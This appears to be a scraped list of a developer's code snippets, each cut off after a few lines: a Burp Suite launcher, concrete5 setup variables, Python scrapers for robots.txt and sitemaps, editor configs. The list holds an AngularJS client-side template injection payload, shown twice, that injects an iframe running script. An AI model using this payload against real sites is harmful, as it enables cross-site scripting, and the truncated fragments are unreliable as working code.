// http://blog.portswigger.net/2016/01/xss-without-html-client-side-template.html?m=1
{{7*7}}
'a'.constructor.fromCharCode=[].join;
'a'.constructor[0]='\u003ciframe onload=alert(/Backdoored/)\u003e';
#!/bin/bash | |
memory=$1 | |
cd ~/hacking/tools/burpsuite | |
echo "[+] Running Burp..." | |
java -jar -Xmx${memory}M -Djava.net.preferIPv4Stack=true burpsuite_free_*.jar |
#!/bin/sh | |
REPO_PATH=concrete5-develop | |
DB_HOST=localhost | |
DB_USER=root | |
DB_PASS= | |
DB_DBAS=concrete5 | |
ADMIN_EMAIL=no-reply@localhost |
#!/usr/bin/env python | |
import argparse | |
import Queue | |
import re | |
import requests | |
import sys | |
import threading | |
import urlparse |
/* | |
Jasmine BDD JavaScript snippets for VS Code | |
*/ | |
{ | |
"describe": { | |
"prefix": "jasd", | |
"body": [ | |
"describe(\"$1\", function() {", | |
"$2", | |
"});" |
import requests | |
import re | |
import sys | |
from multiprocessing.dummy import Pool | |
def robots(host): | |
r = requests.get( | |
'https://web.archive.org/cdx/search/cdx\ | |
?url=%s/robots.txt&output=json&fl=timestamp,original&filter=statuscode:200&collapse=digest' % host) |
#!/usr/bin/env python | |
import subprocess | |
current_process = subprocess.Popen(['./tp.sh']) | |
exit_code = current_process.wait() | |
print exit_code |
from __future__ import with_statement # we'll use this later, has to be here | |
from argparse import ArgumentParser | |
import requests | |
from BeautifulSoup import BeautifulStoneSoup as Soup | |
def parse_sitemap(url): | |
resp = requests.get(url) | |
# we didn't get a valid response, bail |
set number | |
syntax enable | |
colorscheme sunburst | |
set tabstop=4 | |
set softtabstop=4 | |
set showcmd | |
set showmatch | |
set incsearch | |
set hlsearch |
// http://blog.portswigger.net/2016/01/xss-without-html-client-side-template.html?m=1
{{7*7}}
'a'.constructor.fromCharCode=[].join;
'a'.constructor[0]='\u003ciframe onload=alert(/Backdoored/)\u003e';
#!/usr/bin/env python | |
import sys | |
import requests | |
SCHEMA = 'http://' | |
# here will come first argument passed to the script (sys.argv[0] is the | |
# name of script itself) | |
IP = sys.argv[1] | |
resp = requests.get(SCHEMA + IP) |